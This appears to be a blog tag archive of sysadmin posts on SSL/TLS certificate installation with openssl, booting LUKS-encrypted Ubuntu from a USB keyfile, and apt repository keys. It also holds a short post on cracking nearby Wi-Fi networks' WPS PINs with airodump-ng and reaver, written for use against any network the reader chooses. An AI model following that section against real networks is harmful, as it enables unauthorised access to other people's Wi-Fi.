Tag Archives: key

How to install/change SSL/TLS certificate

How to add new SSL/TLS certificate

If you need to set up HTTPS, you will need a new SSL/TLS certificate:
1. following information which is needed for certificate request (CSR):

    Country Name (2 letter code)
    State or Province Name (full name)
    Locality Name (eg, city)
    Organization Name (eg, company)
    Organizational Unit Name (eg, section)
    Common Name (e.g. server FQDN or YOUR name)
    Email Address
    you can get FQDN from your serving hostname/domain.

2. Generate a private key and certificate request:

1
openssl req -out cert.csr -new -newkey rsa:2048 -nodes -keyout cert.key

3. buy certificate using generated csr.
4. Add certificate for expiration monitoring (if you have monitoring).
5. setup it to your server

How to install/change SSL/TLS certificate

1. If you received .pfx file, use the following command to decode it:

1
openssl pkcs12 -in domain.pfx -out certificate -nodes

This will write both private key and certificate in certificate file.
2. You should get about 4 files:

    domain-name.crt — X.509 certificate file
    domain-name.csr — X.509 certificate request file
    intermediate.crt — X.509 certificate file of intermediate (proxy) level
    domain-name.key — RSA private key file for certificate

3. Check that files compatible:

1
2
3
openssl rsa -noout -modulus -in cert.key
openssl req -noout -modulus -in cert.csr
openssl x509 -noout -modulus -in cert.crt

All files should have the same modulus.
4. Check dates for new certificate:

1
openssl x509 -noout -dates -in cert.crt

5. Check that domain and intermediate certificate are compatible:

1
2
openssl verify -CAfile intermediate.crt domain-name.crt
domain-name.crt: OK

If you have several intermediate certificates, put them into one intermediate.crt file.
6. Create chain certificate file:

1
cat domain-name.crt intermediate.crt > cert.crt

Remember that first certificate should be for desired domain and intermediate goes after.
7. Put cert.crt and cert.key into server's ssl folder
8. restart web-server
9. Check that certificate updated successfully:

1
openssl s_client -connect domain.name:443 2>/dev/null < /dev/null | openssl x509 -noout -dates

Checking for missing intermediate certificate

if your browser says that site is untrusted and you get the following error:

1
2
3
4
5
6
7
8
9
10
11
12
openssl s_client -connect display.intencysrv.com:443 -showcerts
CONNECTED(00000003)
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=21:unable to verify the first certificate
verify return:1
<...>

than you probably missing intermediate certificate. Find it in Google, check that it's compatible and install (see 4-5 upper). You can check remotely that downloaded intermediate certificate is compatible:

1
openssl s_client -connect domain.name:443 -CAfile ca.crt

Remember,
Apache supports bundled certificates starting from 2.4.8. If you using Apache prior this version you might get a message about a missing intermediate certificate.

Howto hack WPS in wi-fi networks

Install reaver from here

Install air crack tools here

Or install it from standard repo, in ubuntu like

apt-get install aircrack-ng

for the next type
iwconfig

find your wireless interface, in ubuntu like wlan0.
ifconfig wlan0 up

Next command airmon-ng start wlan0. It will make new interface mon0 for monitor mode.

airodump-ng -i mon0
View all around wifi networks and choose one to hack. Remember channel and mac address.
CTRL+C

./reaver -b -c -vv

Then wait for program will find needed wpa key with pin.
It will be bruted not longer than 20 hours.

Ubuntu: booting enctypted fs from with key on usb stick

Install ubuntu server with two partitions:

  • sda1 /boot
  • sda2 encrypted partition

make sda2 encrypted with lvm partitions into it.
Now when your system ready you can load it with password which you enter from keyboard,
but it's boring and we would like boot from keyfile on the usb stick.
mkdir /key && mount /dev/sdb1 /key # there is sdb1 partition on my usb-flash

dd if=/dev/urandom of=/key/keyfile bs=1K count=10

create file /etc/initramfs-tools/scripts/local-top/luks_key_mount with the following content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/bin/sh

case $1 in
prereqs)
     exit 0
     ;;
esac

. /scripts/functions

log_begin_msg "Decrypting root filesystem using a key file."
wait_for_udev
/bin/sleep 7
mkdir /key
/bin/mount -t ext4 /dev/sdb1 /key
/sbin/cryptsetup luksOpen /dev/sda2 crypt_sda2 --key-file /key/keyfile
log_end_msg

if [ ! -b /dev/mapper/srvlvm-srvlvmroot ]
then
  panic "
Welcome to Linux command prompt.
"
fi
exit 0

# in that script /dev/sdb1 — my usb flash card
# /dev/sda2 — my encrypted partition
# /dev/mapper/srvlvm-srvlvmroot — lvm root partition

chmod +x /etc/initramfs-tools/scripts/local-top/luks_key_mount

1
update-initramfs -u

reboot

Repositories (K) Ubuntu

Working with repositories in (K) Ubuntu

nano /etc/apt/source.list:

add here any repositories.

sudo aptitude update and install any software

but if you see error like "key 5A9BF3BB4E5E17B5 no found":

gpg --recv-keys 5A9BF3BB4E5E17B5
gpg --armor --export 5A9BF3BB4E5E17B5 | apt-key add -

after that sudo aptitude update and install software.

or

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com  5A9BF3BB4E5E17B5